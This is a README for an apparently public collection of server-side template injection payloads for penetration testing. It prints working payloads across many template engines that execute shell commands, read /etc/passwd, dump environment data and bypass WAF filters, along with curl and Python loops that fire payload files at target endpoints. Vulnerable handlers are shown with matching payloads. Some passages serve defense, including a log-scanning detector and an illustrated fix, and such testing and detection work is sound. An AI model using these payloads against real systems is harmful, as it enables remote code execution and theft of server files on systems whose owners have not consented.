- Overview
- What is SSTI?
- Features
- Supported Template Engines
- Installation
- Usage
- Payload Categories
- Burp Suite Intruder Usage
- Example Scenarios
- Security and Ethical Use
- Contributing
- References
- License
This repository contains a comprehensive collection of payloads for detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities during penetration testing and security assessments. It includes over 2000 carefully curated and tested payloads.
```bash
git clone https://github.com/payload-box/ssti-advanced-payload-list.git
cd ssti-advanced-payload-list
```
Server-Side Template Injection (SSTI) is a critical security vulnerability that allows an attacker to inject malicious code into the template engine used by a web application. This vulnerability occurs when user input is not properly sanitized before being processed by the template engine.
A successful SSTI can lead to:
- 🔴 Remote Code Execution (RCE): Execute arbitrary commands on the server
- 🔴 Data Leakage: Unauthorized access to sensitive files and data
- 🔴 System Compromise: Full server control
- 🔴 Privilege Escalation: Escalating beyond the web application's own privileges
- 🔴 Information Disclosure: Access to system configuration and environment variables
- ✅ 2000+ Payloads: Comprehensive and continuously updated payload collection
- ✅ 10+ Template Engines: Specialized payloads for popular template engines
- ✅ Burp Suite Compatible: Formats optimized for Intruder
- ✅ Polyglot Payloads: Payloads that work across multiple template engines
- ✅ Bypass Techniques: WAF and filter bypass payloads
- ✅ Categorized: Organized by template engine
- ✅ RCE Focused: Optimized for remote code execution
- ✅ File Reading: Payloads for accessing sensitive files
- ✅ Cross-Platform: Payloads for Linux, Windows, macOS
- ✅ Up-to-Date and Active: Continuously updated with new techniques
- Jinja2 (Flask, Django)
  - 132 unique payloads
  - RCE, file read, information disclosure
  - Filter bypass techniques
- Twig (Symfony)
  - 158 unique payloads
  - System command execution
  - File manipulation payloads
- Smarty
  - 238 unique payloads
  - PHP code execution
  - Comprehensive bypass techniques
- Thymeleaf (Spring Boot)
  - 164 unique payloads
  - Runtime.exec() exploitation
  - ProcessBuilder techniques
- FreeMarker
  - 161 unique payloads
  - Execute utility exploitation
  - ObjectConstructor techniques
- Velocity (Apache)
  - 269 unique payloads
  - ClassLoader manipulation
  - Reflection-based RCE
- ERB (Ruby on Rails)
  - 184 unique payloads
  - System command execution
  - File I/O operations
- Pug/Jade (Node.js)
  - 226 unique payloads
  - child_process exploitation
  - require() abuse
- EJS (Express.js)
  - 200 unique payloads
  - Process manipulation
  - File system access
- Multi-Engine Payloads
  - 171 unique payloads
  - Cross-platform compatibility
  - Multiple template engine support
```bash
# Clone the repository
git clone https://github.com/payload-box/ssti-advanced-payload-list.git
# Navigate to directory
cd ssti-advanced-payload-list
# List payload files
ls Intruder/
```
- Open Burp Suite
- Go to Intruder tab
- Select Payloads tab
- Click "Load" button
- Select the relevant payload file (e.g., `Intruder/jinja2-flask.txt`)
- Template Engine Detection: Identify the template engine used by the target application
- Payload Selection: Choose the relevant payload file
- Testing: Send payloads to the target parameter
- Analysis: Analyze responses and verify the vulnerability
```bash
# Simple test with cURL
curl -X POST https://target.com/vulnerable \
  -d "name={{7*7}}"

# Reading payloads from file (one payload per line)
while IFS= read -r payload; do
  # --data-urlencode keeps characters such as '&' and '+' inside a payload intact
  curl -X POST https://target.com/search \
    --data-urlencode "query=$payload" \
    --silent | grep -i "49\|error\|exception"
done < Intruder/jinja2-flask.txt
```
```python
import requests

# Read payload file (one payload per line, blank lines skipped)
with open('Intruder/jinja2-flask.txt', 'r') as f:
    payloads = [line.strip() for line in f if line.strip()]

# Test each payload against the target parameter
for payload in payloads:
    response = requests.post(
        'https://target.com/vulnerable',
        data={'input': payload},
        timeout=10,
    )
    # Check for successful injection: {{7*7}} evaluated, or /etc/passwd content returned
    if '49' in response.text or 'root:' in response.text:
        print(f"[+] Vulnerable: {payload}")
```
Basic mathematical operations to detect SSTI presence:
```
{{7*7}} → 49
${7*7} → 49
<%= 7*7 %> → 49
{7*7} → 49
```
Collect system information:
```
{{config}}
${T(java.lang.System).getenv()}
<%= ENV %>
{$smarty.server}
#{process.env}
```
Read sensitive files:
```
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
${new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()}
<%= File.read('/etc/passwd') %>
{php}echo file_get_contents('/etc/passwd');{/php}
```
Execute system commands:
```
{{lipsum.__globals__['os'].popen('id').read()}}
${T(java.lang.Runtime).getRuntime().exec('id')}
<%= system('id') %>
{php}system('id');{/php}
${"freemarker.template.utility.Execute"?new()("id")}
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($ex=$rt.getRuntime().exec('id'))
#{process.mainModule.require('child_process').execSync('id').toString()}
```
Filter and WAF bypass techniques:
```
{{''['\x5f\x5fclass\x5f\x5f']}}
{{lipsum|attr('\x5f\x5fglobals\x5f\x5f')}}
{{''.__class__.__mro__[2].__subclasses__()[396]('cat${IFS}/etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
${T(java.lang.Runtime).getRuntime().exec('cat$IFS/etc/passwd')}
```
Works across multiple template engines:
```
{{7*7}}${7*7}<%= 7*7 %>{7*7}
{{config}}${_self}<%= self %>{$smarty}
```
```http
POST /search HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

query=§test§
```
- Mark the injection point with §§ in the Positions tab
- Go to Payloads tab
- Payload type: Simple list
- Payload Options: Load → Select relevant payload file
- Payload Encoding: Enable URL-encode if needed
- Click Start attack button
- Filter responses:
  - Status code: 200, 500
  - Length differences
  - Regex: `(49|root:|uid=|gid=|groups=)`
✓ If "49" appears in response → {{7*7}} executed
✓ If "root:x:0:0" appears → /etc/passwd was read
✓ If "uid=33(www-data)" appears → RCE successful
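The same indicators work on the defensive side. The following Python is an added example, not a script from this repository: it scans constructed access-log request lines for the detection probes listed under Payload Categories (`{{7*7}}`, `${7*7}`, `<%= 7*7 %>`, `{7*7}`, `#{...}`) and for identifiers that appear in the RCE and file-read payloads, and it checks a response body against the markers from the Burp regex above. Instead of matching a bare "49" (which also matches prices, years and IDs), it computes the result the probe would print and looks for exactly that. The log lines, paths, sample bodies and helper names are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log request lines (not real traffic). Payload strings
# are the ones listed in this README, URL-encoded as a client would send them.
SAMPLE_LOG = [
    'GET /hello/alice HTTP/1.1',
    'GET /hello/%7B%7B7*7%7D%7D HTTP/1.1',
    'POST /search?query=%24%7B7*7%7D HTTP/1.1',
    "GET /profile?username=%23%7Bprocess.mainModule.require('child_process')%7D HTTP/1.1",
    'GET /search?query=price+49 HTTP/1.1',
    "GET /hello/%7B%7Blipsum.__globals__%5B'os'%5D.popen('id').read()%7D%7D HTTP/1.1",
]

# Arithmetic probe in any of the delimiter styles from the detection payloads above.
# The operands are captured so the expected result can be computed.
ARITH_PROBE = re.compile(
    r'(?:\{\{|\$\{|<%=|#\{|\{)\s*(\d+)\s*([*+-])\s*(\d+)\s*(?:\}\}|\}|%>)'
)
# Generic template syntax, with or without arithmetic inside.
TEMPLATE_SYNTAX = re.compile(
    r'\{\{.*?\}\}|\$\{.*?\}|<%=.*?%>|#\{.*?\}|\{php\}.*?\{/php\}', re.S
)
# Identifiers taken from the RCE / file-read payloads listed in this README.
EXPLOIT_TOKENS = (
    '__class__', '__subclasses__', '__globals__', 'popen(', 'getRuntime',
    'child_process', 'system(', 'file_get_contents',
    'freemarker.template.utility.Execute',
)
# Response markers from the Burp regex above, minus the bare "49".
RESPONSE_INDICATORS = re.compile(r'(root:|uid=|gid=|groups=)')


def decoded_request(request_line):
    """Return the URL-decoded path+query of a request line such as 'GET /x?y=z HTTP/1.1'."""
    parts = request_line.split(' ')
    target = parts[1] if len(parts) > 1 else request_line
    return unquote_plus(target)


def classify_request(request_line):
    """Classify one request line. Returns the decoded target, the matched signals and,
    for an arithmetic probe, the value the probe would print if it were evaluated."""
    target = decoded_request(request_line)
    signals = []
    expected = None
    m = ARITH_PROBE.search(target)
    if m:
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        expected = {'*': a * b, '+': a + b, '-': a - b}[op]
        signals.append('arith_probe')
    if TEMPLATE_SYNTAX.search(target):
        signals.append('template_syntax')
    if any(tok in target for tok in EXPLOIT_TOKENS):
        signals.append('exploit_tokens')
    return {'target': target, 'signals': signals, 'expected': expected}


def response_confirms(request_line, response_body):
    """True when the response shows the probe was evaluated: the computed arithmetic
    result appears as a whole number in the body, or one of the file-read /
    command-output markers is present."""
    info = classify_request(request_line)
    if info['expected'] is not None:
        # Whole-number match, so 49 does not match inside 1490 or 3490
        if re.search(r'(?<!\d)%d(?!\d)' % info['expected'], response_body):
            return True
    return bool(RESPONSE_INDICATORS.search(response_body))


def scan_log(lines):
    """Return (line, classification) for every line that carries at least one signal."""
    findings = []
    for line in lines:
        info = classify_request(line)
        if info['signals']:
            findings.append((line, info))
    return findings


if __name__ == '__main__':
    for line, info in scan_log(SAMPLE_LOG):
        print(f"{','.join(info['signals']):<30} {info['target']}")
```

Run against real logs, `template_syntax` alone is a low-confidence signal (legitimate values occasionally contain `${...}`), `arith_probe` marks a scanner or tester, and `exploit_tokens` is the one to alert on; confirmation needs the response side, which is what `response_confirms` provides when request and response can be paired.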
Vulnerability:
```python
from flask import Flask, render_template_string

app = Flask(__name__)

@app.route('/hello/<name>')
def hello(name):
    # User input is concatenated into the template source, so Jinja2
    # evaluates any template syntax the input contains
    template = f"<h1>Hello {name}!</h1>"
    return render_template_string(template)
```
Payload:
{{lipsum.__globals__['os'].popen('cat /etc/passwd').read()}}
Result: Contents of /etc/passwd file are returned.
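To show why the handler above is exploitable and what the fix looks like, here is an added, stand-alone illustration that is neither Flask nor Jinja2 code and is not part of this repository: a deliberately minimal template engine that evaluates `{{ ... }}` expressions found in the template source. The function names, template text and probe string are constructed for the illustration. A real engine exposes far more than this toy's restricted evaluator (attribute access, filters, globals), which is exactly why the page's payloads reach `os` and `subprocess`; only the source-versus-data distinction is being demonstrated here.

```python
import ast
import operator
import re

# Toy engine (illustration only): {{ name }} looks up a context variable,
# {{ 7*7 }} evaluates integer arithmetic. Anything else is rejected.
_EXPR = re.compile(r'\{\{\s*(.*?)\s*\}\}')
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def _eval_expr(expr, context):
    """Evaluate one template expression: a context variable or integer arithmetic."""
    tree = ast.parse(expr, mode='eval').body

    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.Name):
            return context[node.id]
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f'unsupported expression: {expr!r}')

    return walk(tree)


def render(template_source, **context):
    """Replace every {{ ... }} in the template *source* with its evaluated value.
    Values substituted in are plain text and are never re-parsed."""
    return _EXPR.sub(lambda m: str(_eval_expr(m.group(1), context)), template_source)


def hello_vulnerable(name):
    """Mirrors the Flask handler above: user input becomes part of the template source."""
    return render(f"<h1>Hello {name}!</h1>")


def hello_fixed(name):
    """The fix: the template source is a constant; user input is supplied as context data."""
    return render("<h1>Hello {{ name }}!</h1>", name=name)


if __name__ == '__main__':
    probe = "{{7*7}}"
    print(hello_vulnerable(probe))  # <h1>Hello 49!</h1>      the probe was evaluated
    print(hello_fixed(probe))       # <h1>Hello {{7*7}}!</h1>  the probe is just text
```

In the real Flask handler the equivalent fix is to keep the template constant and pass the value as context, `render_template_string("<h1>Hello {{ name }}!</h1>", name=name)`; Jinja2 then treats the value as data (and Flask autoescapes it for HTML) instead of parsing it as template syntax.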
Vulnerability:
```java
@GetMapping("/welcome")
public String welcome(@RequestParam String name, Model model) {
    model.addAttribute("name", name);
    return "welcome";
}
```
Payload:
```
${T(java.lang.Runtime).getRuntime().exec('whoami')}
```
Result: The `whoami` command is executed and the system username is returned.
Vulnerability:
```javascript
const pug = require('pug');

app.get('/profile', (req, res) => {
  const username = req.query.username;
  // User input is interpolated into the Pug template source before compilation
  const html = pug.render(`h1 Welcome ${username}`);
  res.send(html);
});
```
Payload:
```
#{process.mainModule.require('child_process').execSync('ls -la').toString()}
```
Result: Directory contents are listed.
Vulnerability:
```php
$template = $twig->createTemplate("Hello {{ name }}!");
echo $template->render(['name' => $_GET['name']]);
```
Payload:
```
{{['cat /etc/passwd']|filter('system')}}
```
Result: /etc/passwd file is read.
Payloads in this repository are for educational and authorized penetration testing purposes only.
✅ DO:
- Test only on systems you are authorized to test
- Obtain written permission (penetration testing contract)
- Take backups before testing
- Keep test results confidential
- Report findings responsibly (Responsible Disclosure)
❌ DON'T:
- Attack systems without authorization
- Test public systems
- Steal or modify data
- Damage systems
- Conduct unauthorized security tests
All legal and ethical responsibility for the use of these tools belongs to the user. The author(s) cannot be held responsible for misuse of these payloads. Check local laws and regulations before use.
We welcome your contributions! To contribute to this project:
- Fork the repository
- Create a feature branch (`git checkout -b feature/amazing-payloads`)
- Commit your changes (`git commit -m 'Add amazing payloads'`)
- Push your branch (`git push origin feature/amazing-payloads`)
- Open a Pull Request
- 🆕 Adding new payloads
- 🐛 Fixing broken payloads
- 📝 Documentation improvements
- 🔧 Adding template engine support
- 🌐 Translation contributions
- 💡 New bypass techniques
- Test the payload and verify it works
- Add to the relevant template engine file
- Add descriptive comments (if needed)
- Avoid duplicate payloads
- Update README (if needed)
- PortSwigger - Server-Side Template Injection
- OWASP - Server-Side Template Injection
- HackTricks - SSTI (Server Side Template Injection)
- PayloadsAllTheThings - SSTI
- Jinja2 Documentation
- Twig Documentation
- Thymeleaf Documentation
- FreeMarker Documentation
- Velocity Documentation
- ERB Documentation
- Pug Documentation
- EJS Documentation
- Smarty Documentation
Total Payloads: 2000+
Template Engines: 10+
File Size: ~500KB
Languages: Python, PHP, Java, Ruby, JavaScript
Last Updated: 2024
Contributors: Open Source Community
- GraphQL SSTI payloads
- Go template payloads
- Rust template payloads
- ASP.NET Razor payloads
- Automated testing scripts
- Docker test environment
- Interactive web interface
- Payload obfuscation techniques
- AI-powered payload generation
- 📧 Email: [Contact repository owner]
- 🐛 Issues: GitHub Issues
- 💬 Discussions: GitHub Discussions
- 🐦 Twitter: [@payload_box]
- 💼 LinkedIn: [Payload Box]
This project is licensed under the MIT License.
MIT License
Copyright (c) 2024 Payload Box
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Thanks to everyone who contributed to this project:
- Security research community
- Open source contributors
- Bug hunters and penetration testers
- Template engine developers
- Everyone who reported issues and suggested improvements
- "Web Application Hacker's Handbook"
- "The Tangled Web"
- "Breaking and Entering"
Made with ❤️ by Security Researchers | For Educational Purposes Only
Stay Legal • Stay Ethical • Stay Secure